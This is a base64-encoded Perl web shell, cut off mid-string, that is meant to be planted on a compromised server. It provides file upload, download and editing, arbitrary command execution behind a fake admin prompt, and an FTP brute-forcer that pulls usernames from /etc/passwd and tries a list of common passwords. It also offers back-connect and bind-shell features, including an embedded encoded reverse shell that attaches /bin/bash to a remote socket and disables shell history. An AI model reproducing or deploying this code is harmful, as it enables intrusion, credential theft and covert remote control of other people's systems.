LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQ